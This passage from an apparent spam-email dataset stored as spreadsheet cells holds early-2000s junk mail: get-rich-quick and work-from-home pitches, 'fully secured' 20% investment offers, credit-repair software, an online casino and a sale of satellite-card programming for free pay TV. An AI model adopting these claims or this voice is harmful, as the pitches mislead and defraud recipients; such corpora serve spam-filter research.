receive further mailings, please click below and enter your
email at the bottom of the page. You may then rest-assured that you will
never receive another email from us again. http://www.removeyou.com  The
21st Century Solution.
I.D. # 030500
Regards'
P. K.  Marketing---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">
Expand your business! Make it easy for your customers
to pay using Visa, Master Card, Discover, American
Express, Debit Card and Checks via Phone/Fax/Internet.
How? Through a business Merchant Account!By providing multiple methods of acceptable payment
you automatically help ensure that it will be easier
for them to pay you and build up trust. People DON'T
want to send cash or checks via mail, because it is
dangerous and gives them absolutely no guarantees
whatsoever.So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
  </si>
  <si>
    <t xml:space="preserve">                 FOLLOW ME TO FINANCIAL FREEDOM!!I Am looking for people with good work ethic and extrordinary desire
 to earn at least $10,000 per month working from home!NO SPECIAL SKILLS OR EXPERIENCE REQUIRED We will give you all the 
training and personal support you will need to ensure your success!This LEGITIMATE HOME-BASED INCOME OPPORTUNITY can put you back in
               control of your time,your finances,and your life!If you've tried other opportunities in the past that have failed to 
               live up their promises,     THIS IS DIFFERENT THEN ANYTHING ELSE YOU'VE SEEN!       THIS IS NOT A GET RICH QUICK SCHEME!YOUR FINANCIAL PAST DOES NOT HAVE TO BE YOUR FINANCIAL FUTURE!               CALL ONLY IF YOU ARE SERIOUS!                 1-800-345-9708     DONT GO TO SLEEP WITHOUT LISTENING TO THIS!"ALL our dreams can come true- if we have the courage to persue them"
                   -Walt DisneyPlease Leave Your Name And Number And Best Time To Call               DO NOT RESPOND BY EMAILThis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t>
  </si>
  <si>
    <t xml:space="preserve">
H
6.29% Fixed Rate!!
HRates Have Fallen Again!!!
DO NOT MISS OUT!!
LET BANKS COMPETE FOR YOUR
BUSINESS!!!
ALL CREDIT WELCOMEClick Here Now For Details!~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
CLICK HERE to unsubscribe from this mailing list
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#</t>
  </si>
  <si>
    <t xml:space="preserve">
--1465727098.996838841831.JavaMail.RovAdmin.rovweb003
Content-Type: text/plain; charset=iso-8859-1Your Membership Community &amp; Commentary (August 3, 2001)
It's All About Making MoneyInformation to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power 
and potential the web brings to every Net-Preneur. --- This Issue Contains Sites Who Will Trade Links With You! --- -------------
IN THIS ISSUE
-------------
Top Ten Most Important Things to Do Today
Member Showcase
Commentary Quick Tips
Win A FREE Ad In Community &amp; Commentary||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
    Today's Special Announcement:
||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;Right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 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;You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Top Ten Most Important Things to Do Today
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Top Ten Most Important Things to Do Today
By Michael E. AngierThis is my list. They're the ones I've selected for my life at
present. Consider them suggestions for yourself--ideas to 
help you generate your own top ten list. By getting clear 
on and acting upon YOUR most important steps, you'll be 
moving toward and experiencing your highest and best.
1. Practice gratefulness. Reflect upon the things in my life for
which I'm grateful. If I appreciate more of what I have, I will
have even more to appreciate.2. Write out my three most important goals and visualize 
how my life will be when I have achieved them. FEEL it. 
EXPERIENCE it in as much sensory detail as I can possibly 
imagine.3. Take some action steps toward each of the three goals.4. Exercise my body and monitor carefully what I eat and 
drink. Reduce fat and caloric intake while expending more 
calories. Eat only small amounts at one time.5. Read something educational, inspirational or
entertaining--preferably all three.6. Meditate. Empty my conscious mind and listen to the
Super-conscious.7. Have fun doing something I love to do. Experience joy.8. Write something--anything. If not an article or part of 
my book, then write in my journal.9. Perform some act of kindness. Do a thoughtful, 
magnanimous thing--anonymously if possible.10. Finish something. Do something I can call complete.Bonus Step: Make something work better -- 
Practice ADS: Automate, Delegate and Systemize.
Copyright 2001 Michael Angier &amp; Success Networks International.
-------------------------------------
About the Author...Michael Angier is the founder and president of Success Networks.
Success Net's mission is to inform, inspire and empower people
to be their best--personally and professionally. Download their
free eBooklet, KEYS TO PERSONAL EFFECTIVENESS from
http://www.SuccessNet.org/keys.htm. Free subscriptions,
memberships, books and SuccessMark Cards are available at
http://www.SuccessNet.org 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Member Showcase
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Examine carefully - Those with email addresses included WILL 
TRADE LINKS with you... You are encouraged to contact them. 
There Are Many Ways To Build A Successful Business - Just look 
at these successful sites &amp; programs other members are involved 
in...
-------------------------------------------------******** FREE CD-Rom Software ********* 
Over 1000 high quality software titles on CD-ROM 
absolutely FREE! YES, the software is free, (s/h) 
Click Here: http://www.adreporting.com/at.cgi?a=156074&amp;e=/2/ 
---------------------------------------------------------------------Stop Smoking - Free Lesson !! 
Discover the Secret to Stopping Smoking. 
To Master these Powerful Techniques, Come to 
http://www.breath-of-life.net for your Free Lesson. 
Act Now!  P.S. Tell someone you care about. 
Trade Links - jturco3@hotmail.com 
---------------------------------------------------------------------For a limited time only, we are offering --TWO-- FREE eBooks 
to show you how to MAKE MONEY ON THE INTERNET! 
Use our PROVEN, DUPLICATABLE methods to get in on 
this EXPLODING opportunity now!  Visit us at: 
http://www.Abundance-Group.com to collect your FREE offers! 
Trade Links - Gina@AbundanceGroup.com 
---------------------------------------------------------------------Life Without Debt! What would you do with 5,000 10,000 
20,000 100,000? A "Dream Team" of heavy hitters are 
gathering to promote Life Without Debt. Get in NOW to 
receive Massive spillover in the 2x matrix. 
http://trafficentral.com/lwd/index.htm 
--------------------------------------------------------------   If you have a product, service, opportunity or quality 
  merchandise that appeals to people worldwide, reach your 
  targeted audience! For a fraction of what other large 
  newsletters charge you can exhibit your website here, and 
  trade links for only $8 CPM.ï¿½ Compare that to the 
  industry average of $10-$15 CPM. Why?... Because as a 
  valuable member we want you to be successful! Order today - 
  Showcases are limited and published on a first come, first 
  serve basis. For our secure order form, click here: 
  http://bannersgomlm.com/ezine 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Commentary Quick Tips
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Website Recommendation:Here is a site with some useful tips. 
Example - test your Internet connection speed.  
http://www.camscape.com/tips/
I doubled my DSL speed with just one minor tweak 
suggested by one of the links given.Submitted by F. Knopke
imco@telusplanet.net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~Do you have a marketing hint, product recommendation, or
online gem of wisdom you'd like to share with your fellow
subscribers? With your 2 - 10 line Quick Tip include your
name and URL or email address and  we'll give you credit
for your words of wisdom.And, if you're looking for free advertising, this isn't
the place - check out the 'One Question Survey' below for
a great free advertising offer.Send it in to mailto:Submit@AEOpublishing.com
with 'Quick Tip' in the Subject block.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Win A FREE Ad In Community &amp; Commentary
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To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QUESTION OF THE WEEK (08/03/01)...
 No right or wrong answers, and just by answering
 you are entered to win a Sponsorship Showcase  - Free! ~~~ How many email messages do you get per day? ~~~Less than 40            mailto:one@AEOpublishing.com
41-100                        mailto:two@AEOpublishing.com
101-300                    mailto:three@AEOpublishing.com
301-1000                    mailto:four@AEOpublishing.com
More than 1000        mailto:five@AEOpublishing.comTo make this as easy as possible for you, just click on the
hyperlinked answer to send us an e-mail  - you do not need to
enter any information in the subject or body of the message.** ADD YOUR COMMENTS!  Follow directions above and
add your comments in the body of the message, and we'll
post the best commentaries along with the responses.You will automatically be entered in our drawing for a free
Sponsorship ad in the Community &amp; Commentary. Please
respond only one time per question.  Multiple responses
from the same individual will be discarded.Last Weeks's Survey Results &amp; Comments  (07/27/01) ~~~ Are you concerned about identity theft online? ~~~yes   81%
no    19%Comments:
~~~~~~~~~No. This is a funny thing to me.  I hear about so many 
people being super scared to give out their SS#.  Well folks, 
I can get your SS# for 50 cents.  Give me a name and address 
and about 90% of the time I can get the number.  We are so worried about putting our credit card number on
the net, but we will give the card to a waiter or waitress and 
they take it out of our sight for 10 minutes.  They could do 
who knows what with the CC number.  I once had a person 
tell me that her lawyer said that she should never fax a copy 
of her check to anyone (checks by fax) because then that 
person (me) would have her account info and could write 
a check out for thousands of dollars.  I told her to just send 
it to me then and she said that was OK.  Then I asked her 
to tell me what the difference was between the original check 
and a fax copy.  I told her to ask her lawyer that too.  Never 
heard back from her.  The bottom line is that if a crook wants to get your info, it is 
available in many places.  Have a good day.
--  Terry    http://mysiteinc.com/tfn/lfi.html
~~~~~~~~~Yes. I believe that the risk is out there but minimal. However, 
we can cut those risks by a few simple precautions. Most 
importantly, never give any personal information at a site 
that is not secure, always look for the lock in thetask bar 
or a Veri secure sign or others. Also, never leave your information stored at a site. I put 
in my credit information in each time instead of having 
an account in standing, a little more time but less risks 
involved! Of course, I mostly shop at my own Internet 
mall and I know how safe it is there, credit card info is 
deleted in a matter of seconds. Overall, I believe the web 
to be a safe and very fruitful new frontier!
--  Catherine F.      http://www.catco.nexgenmall.com 
~~~~~~~~~Yes. I had phenomena for 6 weeks and did not realize that 
my ISP was shut down at the same time because the owner 
was in a bad car accident.  I had a full service account.  
My Internic fees were not paid so my WEB Address 
went unprotected.  A Russian stepped in; paid the fees; 
and, promptly assigned my www.SchoolOfGeomatics.com 
address to a porn shop.  Thus, I lost 4 years of building 
up 1st place rankings on 12 Search Engines and 2nd place 
on 8 more.  This set me back about 4  months: I believe I 
lost a minimum of $50,000.  
I have also been hit with viruses about 10 times.  The first 
time I lost almost 4 months of work.  Now, I back up often 
enough to not to lose so much time.  This is also Internet 
theft.  These people are nothing but out and out criminals 
and should spend years behind bars.
Customers are well protected from credit card theft; 
however, merchants can lose a lot of money.  I sell only by 
purchase order and certified or registered company checks.
--  Peter S.    http://www.GSSGeomatics.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~               JULY WINNER ANNOUNCED!
And the July 'One-Question Survey' WINNER is...           John Stitzel   -   oldstitz@yahoo.com                   Congratulations John!=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
To change your subscribed address, send both new and old 
address to mailto:Submit@AEOpublishing.com 
See the link (below) for our Subscription Center to unsubscribe 
or edit your interests. Please send suggestions and comments to: 
mailto:Editor@AEOpublishing.com 
I invite you to send your real successes and showcase 
your strategies and techniques, or yes, even your total bombs, 
"Working Together We Can All Prosper." 
mailto:Submit@AEOpublishing.com For information on how to sponsor Your Membership 
Community &amp; Commentary visit: http://bannersgomlm.com/ezine Copyright 2001 AEOpublishing.com 
------------------------------------------------
web: http://www.AEOpublishing.com
------------------------------------------------This email has been sent to jm@netnoteinc.com at your 
request, by Your Membership Newsletter Services.Visit our Subscription Center to edit your interests or unsubscribe.
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.8lhtdma6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.comView our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jspPowered by 
Constant Contact(R)
www.constantcontact.com
--1465727098.996838841831.JavaMail.RovAdmin.rovweb003
Content-Type: text/html; charset=iso-8859-1
Your Membership Community &amp; Commentary, 08-03-01Your Membership Community &amp; Commentary
ï¿½ï¿½It's All About Making Money
August 3, 2001ï¿½ï¿½in this issue
Top Ten Most Important Things to Do Today
Member Showcase
Commentary Quick Tips
Win A FREE Ad In Community &amp; CommentaryToday's Special Announcement:
Right now, this week only - We have left over inventory, it's
unsold, but not for long.Â  If you could use 1 million banner
ads all targeted and dirt cheap go here today. This package
is guaranteed!! It's tough to fail when you can show your ad
to 1,000 people for less than a buck! A free custom banner
will be made for you with this deal!
Click Here!
Â 
Â 
You are a member in at least one of these programs 
- You should be in them all! 
 BannersGoMLM.com 
 ProfitBanners.com 
 CashPromotions.com 
 MySiteInc.com 
 TimsHomeTownStories.com 
 FreeLinksNetwork.com 
 MyShoppingPlace.com 
 BannerCo-op.com 
 PutPEEL.com 
 PutPEEL.net 
 SELLinternetACCESS.com 
 Be-Your-Own-ISP.com 
 SeventhPower.com 
ï¿½ï¿½Information to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- 
 Top Ten Most Important Things to Do Todayï¿½ï¿½This is my list. They're the ones I've selected for my life at
present. Consider them suggestions for yourself--ideas to
help you generate your own top ten list. By getting clear
on and acting upon YOUR most important steps, you'll be
moving toward and experiencing your highest and best.
Â 
1. Practice gratefulness. Reflect upon the things in my life for
which I'm grateful. If I appreciate more of what I have, I will
have even more to appreciate.
2. Write out my three most important goals and visualize
how my life will be when I have achieved them. FEEL it.
EXPERIENCE it in as much sensory detail as I can possibly
imagine.
3. Take some action steps toward each of the three goals.
4. Exercise my body and monitor carefully what I eat and
drink. Reduce fat and caloric intake while expending more
calories. Eat only small amounts at one time.
5. Read something educational, inspirational or
entertaining--preferably all three.
6. Meditate. Empty my conscious mind and listen to the
Super-conscious.
7. Have fun doing something I love to do. Experience joy.
8. Write something--anything. If not an article or part of
my book, then write in my journal.
9. Perform some act of kindness. Do a thoughtful,
magnanimous thing--anonymously if possible.
10. Finish something. Do something I can call complete.
Bonus Step: Make something work better --
Practice ADS: Automate, Delegate and Systemize.
Â 
Copyright 2001 Michael Angier &amp; Success Networks International.
-------------------------------------
About the Author...
Michael Angier is the founder and president of Success Networks.
Success Net's mission is to inform, inspire and empower people
to be their best--personally and professionally. Download their
free eBooklet, KEYS TO PERSONAL EFFECTIVENESS from
http://www.SuccessNet.org/keys.htm.
Free subscriptions,
memberships, books and SuccessMark Cards are available at
http://www.SuccessNet.org 
Member Showcaseï¿½ï¿½Examine carefully - Those with email addresses included WILL
TRADE LINKS with you... You are encouraged to contact them.
There Are Many Ways To Build A Successful Business - Just look 
at these successful sites &amp; programs other members are involved
in...
-------------------------------------------------
******** FREE CD-Rom Software *********
Over 1000 high quality software titles on CD-ROM
absolutely FREE! YES, the software is free, (s/h)
Click Here: http://www.adreporting.com/at.cgi?a=156074&amp;e=/2/
---------------------------------------------------------------------
Stop Smoking - Free Lesson !!
Discover the Secret to Stopping Smoking.
To Master these Powerful Techniques, Come to
http://www.breath-of-life.net
for your Free Lesson.
Act Now!Â  P.S. Tell someone you care about.
Trade Links - jturco3@hotmail.com
---------------------------------------------------------------------
For a limited time only, we are offering --TWO-- FREE eBooks
to show you how to MAKE MONEY ON THE INTERNET!
Use our PROVEN, DUPLICATABLE methods to get in on
this EXPLODING opportunity now!Â  Visit us at:
http://www.Abundance-Group.com
to collect your FREE offers!
Trade Links - Gina@AbundanceGroup.com
---------------------------------------------------------------------
Life Without Debt! What would you do with 5,000 10,000
20,000 100,000? A "Dream Team" of heavy hitters are
gathering to promote Life Without Debt. Get in NOW to
receive Massive spillover in the 2x matrix.
http://trafficentral.com/lwd/index.htm
-------------------------------------------------
If you have a product, service, opportunity or quality 
merchandise that appeals to people worldwide, reach your targeted audience!
For a fraction of what other large newsletters charge you can 
exhibit your website here, and trade links for only $8 CPM.Â  
Compare that to the industry average of $10-$15 CPM. 
Why?... Because as a valuable member we want you 
to be successful! Order today -
Showcases are limited and published on a first come, first serve
basis.
For our secure order form, click here: http://bannersgomlm.com/ezine
Commentary Quick Tipsï¿½ï¿½Website Recommendation:
Here is a site with some useful tips.
Example - test your Internet connection speed.
http://www.camscape.com/tips/
I doubled my DSL speed with just one minor tweak
suggested by one of the links given.
Submitted by F. Knopke
imco@telusplanet.net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Do you have a marketing hint, product recommendation, or
online gem of wisdom you'd like to share with your fellow
subscribers? With your 2 - 10 line Quick Tip include your
name and URL or email address andÂ  we'll give you credit
for your words of wisdom.
And, if you're looking for free advertising, this isn't
the place - check out the 'One Question Survey' below for
a great free advertising offer.
Send it in to mailto:Submit@AEOpublishing.com
with 'Quick Tip' in the Subject block. 
Win A FREE Ad In Community &amp; Commentaryï¿½ï¿½To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Â QUESTION OF THE WEEK (08/03/01)...
Â No right or wrong answers, and just by answering
Â you are entered to win a Sponsorship ShowcaseÂ  - Free!
Â ~~~ How many email messages do you get per day? ~~~
Less than 40Â Â Â Â Â Â Â Â Â Â Â 
mailto:one@AEOpublishing.com
41-100Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
mailto:two@AEOpublishing.com
101-300Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
mailto:three@AEOpublishing.com
301-1000Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
mailto:four@AEOpublishing.com
More than 1000Â Â Â Â Â Â Â  mailto:five@AEOpublishing.com
To make this as easy as possible for you, just click on the
hyperlinked answer to send us an e-mailÂ  - you do not need to
enter any information in the subject or body of the message.
** ADD YOUR COMMENTS!Â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question.Â  Multiple responses
from the same individual will be discarded.
Last Weeks's Survey Results &amp; CommentsÂ  (07/27/01)
Â ~~~ Are you concerned about identity theft online? ~~~
yesÂ Â  81%
noÂ Â Â  19%
Comments:
~~~~~~~~~
No. This is a funny thing to me.Â  I hear about so many
people being super scared to give out their SS#.Â  Well folks,
I can get your SS# for 50 cents.Â  Give me a name and address
and about 90% of the time I can get the number.
We are so worried about putting our credit card number on
the net, but we will give the card to a waiter or waitress and
they take it out of our sight for 10 minutes.Â  They could do
who knows what with the CC number.Â  I once had a person
tell me that her lawyer said that she should never fax a copy
of her check to anyone (checks by fax) because then that
person (me) would have her account info and could write
a check out for thousands of dollars.Â  I told her to just send
it to me then and she said that was OK.Â  Then I asked her
to tell me what the difference was between the original check
and a fax copy.Â  I told her to ask her lawyer that too.Â 
Never
heard back from her.
The bottom line is that if a crook wants to get your info, it is
available in many places.Â  Have a good day.
--Â  TerryÂ Â Â 
http://mysiteinc.com/tfn/lfi.html
~~~~~~~~~
Yes. I believe that the risk is out there but minimal. However,
we can cut those risks by a few simple precautions. Most
importantly, never give any personal information at a site
that is not secure, always look for the lock in thetask bar
or a Veri secure sign or others.
Also, never leave your information stored at a site. I put
in my credit information in each time instead of having
an account in standing, a little more time but less risks
involved! Of course, I mostly shop at my own Internet
mall and I know how safe it is there, credit card info is
deleted in a matter of seconds. Overall, I believe the web
to be a safe and very fruitful new frontier!
--Â  Catherine F.Â Â Â Â Â  http://www.catco.nexgenmall.com
~~~~~~~~~
Yes. I had phenomena for 6 weeks and did not realize that
my ISP was shut down at the same time because the owner
was in a bad car accident.Â  I had a full service account.
My Internic fees were not paid so my WEB Address
went unprotected.Â  A Russian stepped in; paid the fees;
and, promptly assigned my www.SchoolOfGeomatics.com
address to a porn shop.Â  Thus, I lost 4 years of building
up 1st place rankings on 12 Search Engines and 2nd place
on 8 more.Â  This set me back about 4Â  months: I believe I
lost a minimum of $50,000.
Â 
I have also been hit with viruses about 10 times.Â  The first
time I lost almost 4 months of work.Â  Now, I back up often
enough to not to lose so much time.Â  This is also Internet
theft.Â  These people are nothing but out and out criminals
and should spend years behind bars.
Â 
Customers are well protected from credit card theft;
however, merchants can lose a lot of money.Â  I sell only by
purchase order and certified or registered company checks.
--Â  Peter S.Â Â Â  http://www.GSSGeomatics.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
JULY WINNER ANNOUNCED!
And the July 'One-Question Survey' WINNER is...
Â Â Â Â Â Â Â Â Â Â  John StitzelÂ Â 
-Â Â  oldstitz@yahoo.com
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Congratulations John! 
ï¿½ï¿½To change your subscribed address,
send both new and old address to Submit
See the link (to the left) for our Subscription Center to unsubscribe or edit your interests.Please send suggestions and comments to: Editor
I invite you to send your real successes and showcase 
your strategies and techniques, or yes, even your total bombs, 
"Working Together We Can All Prosper." Submit
For information on how to sponsor Your Membership 
Community &amp; Commentary visit: Sponsorship
Showcase
Copyright 2001 AEOpublishing.com  ï¿½::ï¿½ visit our site 
    This email was sent to jm@netnoteinc.com, at your request, by Your Membership Newsletter Services.  
    Visit our Subscription Center to edit your interests or unsubscribe.
    View our privacy policy.  
    Powered by--1465727098.996838841831.JavaMail.RovAdmin.rovweb003--</t>
  </si>
  <si>
    <t xml:space="preserve">
Get All Satellite Channels Free !!Now your can program your satellite system to get all
channels free. This include Direct Tv, Dishnetwork 
and Gla. Our satellite programming packages comes with
everything your need to program your satellite system.
The software is ease as 1,2,3 to use and it takes less
that 5 minute to program your satellite system. There 
are company that will charge you up to $600 to do this
for you and everytime your card needs to be reset they 
charge you an extra $100.00 Now you can do it yourself for :
Only $99.00
Email us 
for order information.
Free sports, Free xxx Movies, Free Pay perview.
</t>
  </si>
  <si>
    <t xml:space="preserve">
*** Compliance: see notice at bottom of mail
************************************************Are you wasting money EVERY SINGLE MONTH?
Home Mortgage Rates have DROPPED!
Simply fill out our FREE NO OBLIGATION form and find out how much you can save.
It's That Easy!
Visit our website:
http://www.deal-makerz.com/
      ================================================
Compliance Notice: This mail is sent in compliance with
all State and Federal laws.
You are receiving this mail because your address was in a list of
previous business contacts, or on a purchased list of opt-in,
previous business contacts, or general internet addresses.
Our most important list is our list of addresses who have 
expressed their desire to be removed from future mailings.
All remove requests are automatically processed within 72 hours.
Once your address is processed, you will NEVER
receive marketing mail at that address from us again.To be removed, click below, and send:
mailto:response@media-central.net?subject=remove</t>
  </si>
  <si>
    <t>e Earn
        $1500 Or More Per Week!
          Â 
        This offer is limited to the first 49
          people who contact me today!Let's face it, every business
                opportunity is not for everyone.Â  You need something that
                fits your needs, budget, and schedule.Â  That is why we have
                put together several "Real"
                Income Opportunities  just for you. We have searched
                and searched and finally found and compiled the best
                opportunities available.Â Â 
I promise, you
                will not regret it. You will finally find something you truly
                can make Money with.Â You really can make an Extra $200
                to $1,500 a Week if you have a few hours a week to work
                your business!
You do not have to
                pay one dime to find out about these true money making
                opportunities.Â  Just
                Call 1(800)234-8190 and we will show you the best, real
                moneymakers available.Â  It
                is 100% FREE, so visit us today, do not miss out on a
                life changing opportunity.
This is Absolutely No
                Risk, so Call 1(800)234-8190 Right Now, and Find The Opportunity of A
                Lifetime!
Â 
Call 1(800)234-8190 Immediatly24 Hrs / 7 Days
Â Â 
-
                                    Testimonials -
                                    Â 
                                  "My very
                                    first day with less than an hour of my spare
                                    time I made over $123.00. My second day I
                                    duplicated that in less than 30
                                    minutes."Jason Vielhem
"Mr.
                                    Skeptical"
---------------
                                    Â 
                                  "I
                                    literally make thousands each month from the
                                    comfort of my home, heck my couch! Thank you
                                    for changing my life forever!"
                                    Â 
                                  Jenna Wilson---------------a
Â 
Â 
Â 
Â 
Â Put your email address in body of email and send email to here
++++++++++++++</t>
  </si>
  <si>
    <t xml:space="preserve">
Make 20% In 9 Months-Fully Secured!Investor Alert:Is the stock market roller coaster making you worried?
Join the flight to quality. Make 20% in 9 months!!!Earn over 2% monthly through fully secured Accounts
Receivable Acquisitions-prepaid monthly in advance!!!You heard right-over 2% monthly prepaid in advance!Discover what banks have been doing for decades!
Harness the power &amp; liquidity of fully secured accounts
receivable acquisitions.Look into our safe haven with a return of 20% in 9 months-
earn over 2% monthly, prepaid in advance!Contact us for your "FREE" In-Depth Information Package!
Just fill out the form at our website!
http://www.market-watcher.com/20percent.htm(REMOVAL INSTRUCTIONS)
This mailing is done by an independent marketing company.
Please do not use the reply to this e-mail, an e-mail reply
cannot be read. If you would like to be removed from our mailing
list, just click below and send us a remove request email.(To Be Removed)
mailto:notyet4me858@usa.com?subject=Remove20%ARA
</t>
  </si>
  <si>
    <t xml:space="preserve">
Expand your business! Make it easy for your customers
to pay using Visa, Master Card, Discover, American
Express, Debit Card and Checks via Phone/Fax/Internet.
How? Through a business Merchant Account!By providing multiple methods of acceptable payment
you automatically help ensure that it will be easier
for them to pay you and build up trust. People DON'T
want to send cash or checks via mail, because it is
dangerous and gives them absolutely no guarantees
whatsoever.So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
</t>
  </si>
  <si>
    <t xml:space="preserve">
You have been specially selected to qualify for the following:Premium Vacation Package and Pentium PC Giveaway
To review the details of the please click on the link 
with the confirmation number below:http://vacation.1chn.comConfirmation Number#Lh340
Please confirm your entry within 24 hours of receipt of this confirmation.Wishing you a fun filled vacation!
If you should have any additional questions or cann't connect to the site 
do not hesitate to contact me direct:
mailto:vacation@btamail.net.cn?subject=Help!
</t>
  </si>
  <si>
    <t xml:space="preserve">
Got Bad Credit???FIX IT!!!YES! Fix your OWN credit report with our easy to use software.No Attorney Fees!Simply download your way to good credit.Get rid of negatives on your credit report easily!NuCredit is available in two versions:NuCredit for individual use is ONLY $49.95 ORCredit Pro for use with up to 10 people for ONLY $99.00
Follow the link below and start repairing your credit TODAY!!
If you wish to be removed from our mailing list please click the link below and indicate the address at which you received this original email at so we can properly remove it from our list.
</t>
  </si>
  <si>
    <t xml:space="preserve">Beautiful, 
high-end, custom websites (or yours redesigned) for $399 
complete! 
Â Â 
Â 
Â 
Â All sites are started from scratch.Â  We build them in 
whatever fashionÂ the clientÂ likes and we employ only top 
designers.Â Includes up to 6 pages 
(you can add more), feedback forms, more. To get this price you must host with 
usÂ with us for only 
@19.95/month (100 megs, 20 Email POP accounts and more). We have references 
coast to coast and a rep for your area. Complete 
below or call 800-977-5115 (24 
hours) for details and site addresses to 
view.
Name:Company:
New SiteRedesign 
Current Site: Phone1 :Phone2:
Email:
State:
Â To Be Removed From Our List, 
CLICK HERE: Remove 
My_Address 
</t>
  </si>
  <si>
    <t xml:space="preserve">
We invite you to experience the most exciting casino and sports wagering and poker experience on the 'net!!http://instant-access.ws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have.http://instant-access.ws With Our Casino you get: 
Real money wagering on 25+ games and sports 
Stunning 3D Graphics and unequaled gameplay 
Safe, Secure and Reliable gaming system 
Online Java Games 
FREE casino software 
10% signup bonus for first time players to our Casino 
24 hour technical supporthttp://instant-access.wsFor you Poker Players who enjoy live internet poker action playing favorite card games like Texas Hold'em, Seven Card Stud and Omaha we have made available seperate state of the art Poker Room software.All of our games offered, give you the opportunity to play for free or wager with real money.We encourage you to visit us now!  http://instant-access.ws********************************************************IMPORTANT: To be removed from this list, simply click the link below. You 
will be added to our remove list. REMOVE MESSAGE: This message is being sent in full compliance with US Postal and 
Lottery Laws, Title 18, Section 1302 and 1341, or 
Title 18, Section 3005 in the US code, also in the 
code of federal regulations, Volume 16, 
Sections 255 and 436. If you would like to be removed from our E-Mail list, please click here 
mailto:remove9001@xyz002.com?subject=Remove , click send,  and you will be 
removed from our list immediately. If the mailto link is not clickable please send a blank email to 
remove9001@xyz002.com and put "remove" in the subject line, click send, and 
you will be removed from our list immediately. 
**** 
    LoU*****
</t>
  </si>
  <si>
    <t xml:space="preserve">
FINANCIAL INVESTMENT CENTER
INSIDER NEWSÂ See bottom of page for removal instructions.
Stock Market has you concerned? Join the flight to quality. Make over 25% annually, paid monthly by Factoring Account Receivables.Â 
Discover what banks have known for decades. Harness the power and liquidity of Factoring ï¿½ Collateralized Account Receivables.Â 
A safe haven to make strong returns, while stock markets are volatile.Â 
Please Be over the age of 18. Serious inquiries only.Â 
For A Free In-Depth Information Package. Please fill out the form below.CONTACT ME
First
  Name:Last
  Name:Address:City:State:Zip
  Number:Country:Home
  Number:Business
  Number:Email
  Address:Best
  time to call:Â To Be Removed:
Email
  Address:
 </t>
  </si>
  <si>
    <t xml:space="preserve">
DATA
Message-ID: 
From: jasper5645@yahoo.com 
Bcc:
Subject: Secrets of the Ultra Wealthy Revealed ...
Date: Sun, 04 Aug 2024 06:40:35 -0400 (EDT)
MIME-Version: 1.0
Content-Type: TEXT/HTML; charset="US-ASCII"
Content-Transfer-Encoding: 7bitFor years, Hedge investors have made money
in both bear and bull markets. But until recently, hedge trading has been
limited to only the ultra wealthy and well connected investors.
For a limited time, you
have the opportunity to follow a Hedge trader who has had a compounded
average annual rate of return of 74.9%
Best of all, your invited to look over the shoulder
of a trader who is actually making money in 2001 and watch him in action
for FREE !!!
To take advantage of this FREE
one-month access to our private web site, simply reply to this message
with "opt in" in the subjest heading and we will reply to you with our
site location information within 24 hrs.
Â 
To be removed, "click
here"
Â ******************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">*This message was transferred with a trial version of CommuniGate(tm) Pro*
We All
Need a Good Attorney to Call in Today's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life:Monday: The dog bit the mailman - Do you know what to do?
Tuesday:  The Building Inspector drops by and announces that the permits on file with their office do not
    allow your garage conversion. "What now," you think to yourself.
Wednesday: You've been considering home-schooling your children for some time. Now your daughter announces that she is being picked on yet again, and simply will not attend another day. What are the legal ramifications of home schooling your children?Â 
Thursday: Speeding Ticket goes to warrant for your 17-year-old son. You haven't a clue how to handle
    it.Â 
Friday:  Your ex-spouse has missed another child support payment. . . Who do you call?And what about all the other things:Received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available to you all the time. But most of us never have it because we can't afford it.Now there is a program that not only provides quality legal help,
 but it provides it 24 hours a day, with an attorney helping you the same day you call them -
 and it is for a small monthly fee. No Kidding.  Somewhere between twenty and forty dollars a month, depending upon the plan you choose.
  Â Click here
Â 
Not
  interested? Take your em ail out of our data base by visitng the site and following removal instructions 
126
</t>
  </si>
  <si>
    <t>YOU CAN MAKE A SEA OF DIFFERENCEThe non-profit Foundation for the Advancement of Marine Sciences (FAMS)
is dedicated to educating children and teaching teachers about the diverse
aspects of marine life, marine activities and how the marine environment
affects essentially all life on Earth.FAMS offers hands-on, interactive marine science educational programs
designed to foster critical thinking about the complex yet delicate systems
that make up the Earthï¿½s oceans.FAMS has developed a funding program for Biology instructors so they can
assist students in raising money to attend the camp, and in raising funds
